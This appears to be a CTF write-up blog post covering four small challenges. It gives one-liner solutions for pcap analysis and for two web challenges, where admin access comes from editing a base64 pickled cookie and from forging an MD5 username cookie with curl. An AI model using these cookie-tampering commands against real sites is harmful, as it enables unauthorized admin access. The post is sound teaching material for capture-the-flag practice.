So I grouped these all together for two main reasons:
- I was inspired seeing this short writeup for GeoKitties - https://twitter.com/k_firsov/status/726841516174508033
- Write-ups can take some time, so this is a good way of shortening a few challenges into one post.
Quick note about the writeups below:
- Each of the examples below are one-liner solutions (they may not be the best one-liners because they can be longcat-long, but were fun to make)
- Each example below has a one-line output including the CTF{...} flag
No Big Deal Pt. 1 (50):
This one was probably one of the easiest challenges (even easier than the 5pt recon) that I came across, strings'ing the pcap gave an obvious base64 encoded value at the end of the dump, which turned into the flag, here's the one-liner:
strings -n 9 no-big-deal.pcap | tail -n 1 | base64 -D
Result:
CTF{betterfs.than.yours}
In Recorded Conversation (25):
The name of this challenge invoked the idea that there was going to be a hidden conversation to find a flag in. That was exactly it in a pcap! For this one I didn't open wireshark and decided to jump into more tshark. This is not my actual solution for the challenge when I was playing (it was a lot more manual), but the same thing would've worked... Usually there's no time to do silly things like tr, sed & multi-massaged-list-comprehensions to get an answer when you're on the CTF clock.
tshark -r irc.pcap -T fields -e data 2>/dev/null | python -c "import sys; a=sys.stdin.read().split('\n'); a=[x.decode('hex') for x in a]; a=[x for x in a if 'PRIVMSG' in x and '~' not in x]; print a" | tr ',' '\n' | grep #ctf | tail -n 8 | head -n 7 | sed 's/.*://g;s/\\.*//g' | tr '\n' ' ' | sed 's/ //g'
Result:
CTF{some_leaks_are_good_leaks_}
Spotted Quoll (50):
This challenge was mainly solved by a team-mate (Unixist), but I helped out a bit with some minor details. Also formed it into this massive one-liner:
curl -L https://spotted-quoll.ctfcompetition.com/admin --cookie obsoletePickle=$(python -c 'import pickle; x = pickle.loads("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu".decode("base64")); x["user"] = "admin"; print pickle.dumps(x).encode("base64").replace("\n", "")') 2>/dev/null | grep -i ctf
The challenge consisted of identifying that the cookie was in a python pickle format, dumping the current cookie (base64 encoded) and then noticing the user was set to None, changing it to admin and re-encoding it / sending it off.
Result:
Your flag is CTF{but_wait,theres_more.if_you_call} ... but is there more(1)? or less(1)?
Ernst Echidna (50):
This challenge was also a very simple web challenge, consisting of a cookie that was set to the md5 value of your username. The goal was to view the admin section, so a little echo -n admin | md5sum, and we've got our cookie.
curl https://ernst-echidna.ctfcompetition.com/admin --cookie md5-hash=$(echo -n admin | md5) 2>/dev/null | grep -i ctf
Result:
Congratulations, your token is 'CTF{renaming-a-bunch-of-levels-sure-is-annoying}
These were all simple, but very fun! Had a good time forming the (mostly) one-liners above today. Let me know if you have any more efficient examples of these in the comments!
